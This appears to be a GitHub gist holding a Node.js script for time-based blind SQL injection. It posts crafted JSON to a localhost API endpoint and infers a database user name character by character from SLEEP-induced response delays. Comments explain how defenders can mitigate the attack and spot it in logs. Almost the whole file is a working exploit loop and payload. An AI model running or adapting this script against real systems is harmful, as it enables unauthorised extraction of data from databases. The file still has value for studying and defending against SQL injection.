@chiro-hiro
Created April 14, 2020 02:47
Blind SQL injection
const http = require('http');
/**
 * POST `json` to the fixed localhost endpoint below and measure how long the
 * server takes to answer.
 *
 * Resolves with the elapsed time in milliseconds only when the response status
 * is 500; any other status rejects with the plain value 0 (not an Error).
 * No 'error' listener is attached to the request, so a failed connection
 * surfaces as an unhandled 'error' event rather than a rejection.
 *
 * Defender note: the caller uses this as a timing oracle. On the server side,
 * parameterized queries / prepared statements remove the oracle entirely;
 * in logs this pattern shows up as a long run of near-identical POSTs from one
 * client whose latency is strongly bimodal.
 *
 * @param {object} json - request body, serialized with JSON.stringify
 * @returns {Promise<number>} elapsed milliseconds on a 500 response
 */
function request(json) {
return new Promise((resolve, reject) => {
let startTime = Date.now();
let body = JSON.stringify(json);
const options = {
host: 'localhost',
method: 'POST',
port: 3000,
path: '/api/v?/xxxxxx',
headers: {
'Content-Type': 'application/json',
'Content-Lenght': body.length
}
};
let req = http.request(options, (res) => {
// Timing is taken at the first response, not at the end of the body.
if (res.statusCode === 500) {
resolve(Date.now() - startTime);
} else {
reject(0);
}
});
req.write(body);
req.end();
});
}
// Entry point: walks a string one character position at a time, trying every
// character of `charset` at position `offset` and treating a slow 500 response
// (over 1000 ms) as confirmation. The two object-literal properties below share
// the same key, so only the second (the template string) is actually sent.
// A slow response with an empty `value` ends the loop; a position where no
// charset member matches is recorded as '?'.
//
// Defender note: this is the classic time-based blind SQL injection loop — a
// user-controlled value is spliced into SQL text. The mitigation is on the
// server: bind values with parameterized queries and never interpolate input
// into SQL, so the conditional SLEEP() can never reach the database.
(async () => {
let charset = 'abcdefghijklmnopqrstuvwxzABCDEFGHIJKLMNOPQRSTUVWXZ 0123456789.\'';
let offset = 1
let value = '';
let result = [];
let code = 0;
while (true) {
let time = await request({
"xxxxxx_id": "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
"xxxxxx_id": `1" and IF(RIGHT(LEFT((SELECT \`user_name\` FROM \`xxxx\` LIMIT 0,1),${offset.toString()}),1) = '${value}', SLEEP(0.001), FALSE) and ""="`
});
if (time > 1000 && value === '') {
// Slow answer for the empty guess: nothing more to read.
break;
} else if (time > 1000 && value !== '') {
// Slow answer for a real guess: accept it and move to the next position.
console.log('Found character', value, 'at', offset);
result.push(value);
value = '';
offset++;
code = 0;
} else {
// Fast answer: try the next charset member at the same position.
value = charset[code++];
if (code >= charset.length) {
// Charset exhausted without a hit: mark the position unknown and move on.
result.push('?');
value = '';
offset++;
code = 0;
}
}
};
console.log('Result:', result.join(''));
})();